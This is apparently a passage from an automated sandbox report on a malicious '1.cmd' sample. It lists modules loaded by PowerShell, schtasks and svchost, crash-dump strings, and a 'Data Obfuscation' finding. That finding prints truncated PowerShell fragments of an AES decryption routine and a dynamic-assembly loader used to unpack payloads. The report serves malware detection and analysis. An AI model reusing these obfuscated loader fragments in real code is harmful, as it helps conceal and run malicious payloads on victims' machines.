Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1.cmd

Static file information: File size 5214429 > 1048576

Source:	Binary string: System.Configuration.Install.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.pdbSystem.Transactions.ni.dlliy source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.pdbMZ@ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Numerics.pdbp source: WER8767.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbp source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbP source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Drawing.pdb0 source: WER8767.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.Install.pdb }b source: WER8767.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: mscorlib.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: mscorlib.pdb:\W source: WER8767.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Xml.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.pdbP4 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.pdb` source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Xml.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.pdbH source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.Automation.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Drawing.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Transactions.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.Install.pdbh source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.pdbiy source: WER8767.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb N source: WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Numerics.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.CSharp.pdb@ source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=0f51ebcb-4e35-4f5f-b895-e71e4c7e1427HostApplication=C:\Windows\System32\Window
